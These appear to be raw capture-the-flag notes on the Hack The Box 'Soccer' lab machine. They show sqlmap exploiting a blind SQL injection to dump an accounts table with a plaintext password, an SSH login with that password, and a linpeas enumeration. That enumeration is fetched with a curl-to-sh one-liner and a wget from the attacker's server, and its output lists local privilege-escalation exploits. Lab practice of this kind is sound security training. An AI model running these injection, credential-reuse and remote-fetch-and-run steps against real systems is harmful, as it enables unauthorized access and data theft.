[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:43:34 /2023-03-19/
[13:43:34] [INFO] resuming back-end DBMS 'mysql'
[13:43:34] [INFO] testing connection to the target URL
[13:43:37] [INFO] testing if the provided string is within the target URL page content
[13:43:37] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[13:43:37] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6478 OR 1585=1585
---
[13:43:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[13:43:37] [INFO] sqlmap will dump entries of all tables from all databases now
[13:43:37] [INFO] fetching database names
[13:43:37] [INFO] fetching number of databases
[13:43:41] [INFO] resumed: 5
[13:43:41] [INFO] resuming partial value: mys
[13:43:41] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[13:43:41] [INFO] retrieved: ql
[13:44:45] [INFO] retrieved: information_schema
[13:52:18] [INFO] retrieved: performance_schema
[13:59:45] [INFO] retrieved: sys
[14:01:13] [INFO] retrieved: soccer_db
[14:05:20] [INFO] fetching tables for databases: 'information_schema, mysql, performance_schema, soccer_db, sys'
[14:05:20] [INFO] fetching number of tables for database 'soccer_db'
[14:05:20] [INFO] retrieved: 1
[14:05:41] [INFO] retrieved: accounts
[14:09:06] [INFO] fetching number of tables for database 'mysql'
[14:09:06] [INFO] retrieved: 37
[14:09:51] [INFO] retrieved: c^C
[*] ending @ 14:10:33 /2023-03-19/
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" -D soccer_db --tables
___
__H__
___ ___[(]_____ ___ ___ {1.7.2#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:10:49 /2023-03-19/
[14:10:49] [INFO] resuming back-end DBMS 'mysql'
[14:10:49] [INFO] testing connection to the target URL
[14:10:54] [INFO] testing if the provided string is within the target URL page content
[14:10:54] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[14:10:54] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6478 OR 1585=1585
---
[14:10:54] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[14:10:54] [INFO] fetching tables for database: 'soccer_db'
[14:10:54] [INFO] fetching number of tables for database 'soccer_db'
[14:10:57] [INFO] resumed: 1
[14:10:57] [INFO] resumed: accounts
Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+
[14:10:57] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'
[*] ending @ 14:10:57 /2023-03-19/
┌──(kwkl㉿kwkl)-[~]
└─$ sqlmap -u http://localhost:8081?id=1 -p id --technique=B --risk 3 --string="Ticket Exists" -D soccer_db -T accounts --dump-all
___
__H__
___ ___[)]_____ ___ ___ {1.7.2#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:11:06 /2023-03-19/
[14:11:07] [INFO] resuming back-end DBMS 'mysql'
[14:11:07] [INFO] testing connection to the target URL
[14:11:10] [INFO] testing if the provided string is within the target URL page content
[14:11:10] [WARNING] you provided 'Ticket Exists' as the string to match, but such a string is not within the target URL raw response, sqlmap will carry on anyway
[14:11:10] [WARNING] turning off pre-connect mechanism because of incompatible server ('SimpleHTTP/0.6 Python/3.10.7')
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: id=-6478 OR 1585=1585
---
[14:11:10] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 8
[14:11:10] [INFO] sqlmap will dump entries of all tables from all databases now
[14:11:10] [INFO] fetching tables for database: 'soccer_db'
[14:11:10] [INFO] fetching number of tables for database 'soccer_db'
[14:11:16] [INFO] resumed: 1
[14:11:16] [INFO] resumed: accounts
[14:11:16] [INFO] fetching columns for table 'accounts' in database 'soccer_db'
[14:11:16] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:11:16] [INFO] retrieved: 4
[14:11:40] [INFO] retrieved: email
[14:13:50] [INFO] retrieved: id
[14:14:51] [INFO] retrieved: password
[14:18:12] [INFO] retrieved: username
[14:21:37] [INFO] fetching entries for table 'accounts' in database 'soccer_db'
[14:21:37] [INFO] fetching number of entries for table 'accounts' in database 'soccer_db'
[14:21:37] [INFO] retrieved: 1
[14:22:01] [INFO] retrieved: [email protected]
[14:29:32] [INFO] retrieved: 1324
[14:31:45] [INFO] retrieved: PlayerOftheMatch2022
[14:40:50] [INFO] retrieved: player
Database: soccer_db
Table: accounts
[1 entry]
+------+-------------------+----------------------+----------+
| id | email | password | username |
+------+-------------------+----------------------+----------+
| 1324 | [email protected] | PlayerOftheMatch2022 | player |
+------+-------------------+----------------------+----------+
[14:43:23] [INFO] table 'soccer_db.accounts' dumped to CSV file '/home/kwkl/.local/share/sqlmap/output/localhost/dump/soccer_db/accounts.csv'
[14:43:23] [INFO] fetched data logged to text files under '/home/kwkl/.local/share/sqlmap/output/localhost'
[*] ending @ 14:43:23 /2023-03-19/
try the ssh with using
username player
password PlayerOftheMatch2022
login successfully
try the linpeas.sh
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
create the site
┌──(kwkl㉿kwkl)-[~/HODL/htb/soccer]
└─$ python3 -m http.server 3333
Serving HTTP on 0.0.0.0 port 3333 (http://0.0.0.0:3333/) ...
10.10.11.194 - - [19/Mar/2023 15:07:33] "GET /linpeas.sh HTTP/1.1" 200 -
download it
We can execute it and get more and more info
player@soccer:~$ wget http://10.10.16.6:3333/linpeas.sh
--2023-03-19 07:07:33-- http://10.10.16.6:3333/linpeas.sh
Connecting to 10.10.16.6:3333... connected.
HTTP request sent, awaiting response... 200 OK
Length: 828172 (809K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===========================================================================================>] 808.76K 102KB/s in 8.4s
2023-03-19 07:07:43 (96.6 KB/s) - ‘linpeas.sh’ saved [828172/828172]
player@soccer:~$ chmod +x linpeas.sh
player@soccer:~$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
╔═══════════════════╗
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
╚═══════════════════╝
OS: Linux version 5.4.0-135-generic (buildd@lcy02-amd64-066) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022
User & Groups: uid=1001(player) gid=1001(player) groups=1001(player)
Hostname: soccer
Writable folder: /dev/shm
[+] /usr/bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (linpeas can discover hosts, scan ports, and forward ports. Learn more with -h)
[+] /usr/bin/nc is available for network discovery & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
╔════════════════════╗
══════════════════════════════╣ System Information ╠══════════════════════════════
╚════════════════════╝
╔══════════╣ Operative system
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits
Linux version 5.4.0-135-generic (buildd@lcy02-amd64-066) (gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.1)) #152-Ubuntu SMP Wed Nov 23 20:19:22 UTC 2022
Distributor ID: Ubuntu
Description: Ubuntu 20.04.5 LTS
Release: 20.04
Codename: focal
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31
╔══════════╣ CVEs Check
Vulnerable to CVE-2021-3560
Potentially Vulnerable to CVE-2022-2588
╔══════════╣ PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
New path exported: /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
╔══════════╣ Date & uptime
Sun Mar 19 07:08:06 UTC 2023
07:08:06 up 20:03, 2 users, load average: 0.15, 0.03, 0.01
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
disk
sda
sda1
sda2
╔══════════╣ Unmounted file-system?
╚ Check if you can mount umounted devices
LABEL=cloudimg-rootfs / ext4 defaults 0 1
data /data vboxsf uid=1000,gid=1000,_netdev 0 0
vagrant /vagrant vboxsf uid=1000,gid=1000,_netdev 0 0
/dev/sda1 none swap sw 0 0
proc /proc proc defaults,nodev,relatime,hidepid=2
╔══════════╣ Environment
╚ Any private information inside environment variables?
LESSOPEN=| /usr/bin/lesspipe %s
HISTFILESIZE=0
USER=player
SSH_CLIENT=10.10.16.6 53816 22
XDG_SESSION_TYPE=tty
SHLVL=1
MOTD_SHOWN=pam
HOME=/home/player
SSH_TTY=/dev/pts/2
DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/1001/bus
LOGNAME=player
_=./linpeas.sh
XDG_SESSION_CLASS=user
TERM=xterm-256color
XDG_SESSION_ID=1391
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
XDG_RUNTIME_DIR=/run/user/1001
LANG=C.UTF-8
HISTSIZE=0
LS_COLORS=rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arc=01;31:*.arj=01;31:*.taz=01;31:*.lha=01;31:*.lz4=01;31:*.lzh=01;31:*.lzma=01;31:*.tlz=01;31:*.txz=01;31:*.tzo=01;31:*.t7z=01;31:*.zip=01;31:*.z=01;31:*.dz=01;31:*.gz=01;31:*.lrz=01;31:*.lz=01;31:*.lzo=01;31:*.xz=01;31:*.zst=01;31:*.tzst=01;31:*.bz2=01;31:*.bz=01;31:*.tbz=01;31:*.tbz2=01;31:*.tz=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.war=01;31:*.ear=01;31:*.sar=01;31:*.rar=01;31:*.alz=01;31:*.ace=01;31:*.zoo=01;31:*.cpio=01;31:*.7z=01;31:*.rz=01;31:*.cab=01;31:*.wim=01;31:*.swm=01;31:*.dwm=01;31:*.esd=01;31:*.jpg=01;35:*.jpeg=01;35:*.mjpg=01;35:*.mjpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.svg=01;35:*.svgz=01;35:*.mng=01;35:*.pcx=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.m2v=01;35:*.mkv=01;35:*.webm=01;35:*.ogm=01;35:*.mp4=01;35:*.m4v=01;35:*.mp4v=01;35:*.vob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.oga=00;36:*.opus=00;36:*.spx=00;36:*.xspf=00;36:
SHELL=/bin/bash
LESSCLOSE=/usr/bin/lesspipe %s %s
PWD=/home/player
SSH_CONNECTION=10.10.16.6 53816 10.10.11.194 22
XDG_DATA_DIRS=/usr/local/share:/usr/share:/var/lib/snapd/desktop
HISTFILE=/dev/null
╔══════════╣ Searching Signature verification failed in dmesg
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#dmesg-signature-verification-failed
dmesg Not Found
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154
╔══════════╣ Executing Linux Exploit Suggester 2
╚ https://github.com/jondonas/linux-exploit-suggester-2
╔══════════╣ Protections
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
apparmor module is loaded.
═╣ grsecurity present? ............ grsecurity Not Found
═╣ PaX bins present? .............. PaX Not Found
═╣ Execshield enabled? ............ Execshield Not Found
═╣ SELinux enabled? ............... sestatus Not Found
═╣ Seccomp enabled? ............... disabled
═╣ AppArmor profile? .............. unconfined
═╣ User namespace? ................ enabled
═╣ Cgroup2 enabled? ............... enabled
═╣ Is ASLR enabled? ............... Yes
═╣ Printer? ....................... No
═╣ Is this a virtual machine? ..... Yes (vmware)
╔═══════════╗
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
╚═══════════╝
╔══════════╣ Container related tools present
/snap/bin/lxc
╔══════════╣ Am I Containered?
╔══════════╣ Container details
═╣ Is this a container? ........... No
═╣ Any running containers? ........ No
╔═══════╗
═════════════════════════════════════╣ Cloud ╠═════════════════════════════════════
╚═══════╝
═╣ Google Cloud Platform? ............... No
═╣ AWS ECS? ............................. No
═╣ AWS EC2? ............................. No
═╣ AWS Lambda? .......................... No
╔════════════════════════════════════════════════╗
════════════════╣ Processes, Crons, Timers, Services and Sockets ╠════════════════
╚════════════════════════════════════════════════╝
╔══════════╣ Cleaned processes
╚ Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
player 308476 0.0 0.1 10120 5328 pts/2 Ss 07:03 0:00 -bash
player 308505 0.2 0.0 3664 2712 pts/2 S+ 07:07 0:00 _ /bin/sh ./linpeas.sh
player 311609 0.0 0.0 3664 1144 pts/2 S+ 07:08 0:00 _ /bin/sh ./linpeas.sh
player 311610 0.0 0.0 10612 3376 pts/2 R+ 07:08 0:00 | _ ps fauxwww
player 311611 0.0 0.0 3664 1144 pts/2 R+ 07:08 0:00 _ /bin/sh ./linpeas.sh
player 311613 0.0 0.0 3664 1144 pts/2 S+ 07:08 0:00 _ /bin/sh ./linpeas.sh
player 9262 0.0 0.1 10120 5380 pts/1 Ss+ 03:26 0:00 -bash
player 9153 0.0 0.2 19116 9736 ? Ss 03:26 0:00 /lib/systemd/systemd --user
player 11873 0.0 0.1 7108 4004 ? Ss 03:52 0:00 _ /usr/bin/dbus-daemon[0m --session --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
╔══════════╣ Binary processes permissions (non 'root root' and not belonging to current user)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes
╔══════════╣ Files opened by processes belonging to other users
╚ This is usually empty because of the lack of privileges to read other user processes information
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
╔══════════╣ Processes with credentials in memory (root req)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory
gdm-password Not Found
gnome-keyring-daemon Not Found
lightdm Not Found
vsftpd Not Found
apache2 Not Found
sshd Not Found
╔══════════╣ Cron jobs
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs
/usr/bin/crontab
incrontab Not Found
-rw-r--r-- 1 root root 1040 Nov 28 22:08 /etc/crontab
/etc/cron.d:
total 24
drwxr-xr-x 2 root root 4096 Nov 17 08:51 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 201 Feb 14 2020 e2scrub_all
-rw-r--r-- 1 root root 712 Mar 27 2020 php
-rw-r--r-- 1 root root 191 Nov 15 21:40 popularity-contest
/etc/cron.daily:
total 48
drwxr-xr-x 2 root root 4096 Dec 1 18:14 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 376 Dec 4 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
-rwxr-xr-x 1 root root 214 Apr 25 2022 update-notifier-common
/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Nov 15 21:39 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Nov 15 21:39 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x 2 root root 4096 Nov 15 21:40 .
drwxr-xr-x 101 root root 4096 Dec 13 07:44 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 813 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 403 Apr 25 2022 update-notifier-common
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
╔══════════╣ Systemd PATH
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
╔══════════╣ Analyzing .service files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services
/etc/systemd/system/multi-user.target.wants/atd.service is executing some relative path
/etc/systemd/system/multi-user.target.wants/grub-common.service is executing some relative path
/etc/systemd/system/sleep.target.wants/grub-common.service is executing some relative path
You can't write on systemd PATH
╔══════════╣ System timers
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
NEXT LEFT LAST PASSED UNIT ACTIVATES
Sun 2023-03-19 07:09:00 UTC 29s left Sun 2023-03-19 06:39:00 UTC 29min ago phpsessionclean.timer phpsessionclean.service
Sun 2023-03-19 11:19:55 UTC 4h 11min left Sat 2023-03-18 11:19:55 UTC 19h ago systemd-tmpfiles-clean.timer systemd-tmpfiles-clean.service
Sun 2023-03-19 13:38:42 UTC 6h left Sun 2023-03-19 06:52:17 UTC 16min ago ua-timer.timer ua-timer.service
Sun 2023-03-19 14:28:28 UTC 7h left Sun 2023-03-19 04:18:49 UTC 2h 49min ago motd-news.timer motd-news.service
Sun 2023-03-19 17:28:47 UTC 10h left Sat 2023-03-18 18:13:21 UTC 12h ago apt-daily.timer apt-daily.service
Mon 2023-03-20 00:00:00 UTC 16h left Sat 2023-03-18 11:05:04 UTC 20h ago fstrim.timer fstrim.service
Mon 2023-03-20 00:00:00 UTC 16h left Sun 2023-03-19 00:00:06 UTC 7h ago logrotate.timer logrotate.service
Mon 2023-03-20 00:00:00 UTC 16h left Sun 2023-03-19 00:00:06 UTC 7h ago man-db.timer man-db.service
Mon 2023-03-20 00:17:52 UTC 17h left Sun 2023-03-19 06:46:57 UTC 21min ago fwupd-refresh.timer fwupd-refresh.service
Mon 2023-03-20 06:29:22 UTC 23h left Sun 2023-03-19 06:12:10 UTC 56min ago apt-daily-upgrade.timer apt-daily-upgrade.service
Sun 2023-03-26 03:10:59 UTC 6 days left Sun 2023-03-19 03:10:07 UTC 3h 58min ago e2scrub_all.timer e2scrub_all.service
n/a n/a n/a n/a snapd.snap-repair.timer snapd.snap-repair.service
╔══════════╣ Analyzing .timer files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers
╔══════════╣ Analyzing .socket files
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/etc/systemd/system/sockets.target.wants/uuidd.socket is calling this writable listener: /run/uuidd/request
/snap/core20/1695/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core20/1695/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/snap/core20/1695/usr/lib/systemd/system/syslog.socket is calling this writable listener: /run/systemd/journal/syslog
/snap/core20/1695/usr/lib/systemd/system/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/snap/core20/1695/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/snap/core20/1695/usr/lib/systemd/system/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
/usr/lib/systemd/system/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/dbus.socket is calling this writable listener: /var/run/dbus/system_bus_socket
/usr/lib/systemd/system/sockets.target.wants/systemd-journald-dev-log.socket is calling this writable listener: /run/systemd/journal/dev-log
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/stdout
/usr/lib/systemd/system/sockets.target.wants/systemd-journald.socket is calling this writable listener: /run/systemd/journal/socket
╔══════════╣ Unix Sockets Listening
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sockets
/org/kernel/linux/storage/multipathd
/root/.pm2/pub.sock
/root/.pm2/rpc.sock
/run/dbus/system_bus_socket
└─(Read Write)
/run/irqbalance//irqbalance747.sock
└─(Read )
/run/irqbalance/irqbalance747.sock
└─(Read )
/run/lvm/lvmpolld.socket
/run/mysqld/mysqld.sock
└─(Read Write)
/run/mysqld/mysqlx.sock
└─(Read Write)
/run/php/php7.4-fpm.sock
/run/snapd-snap.socket
└─(Read Write)
/run/snapd.socket
└─(Read Write)
/run/systemd/fsck.progress
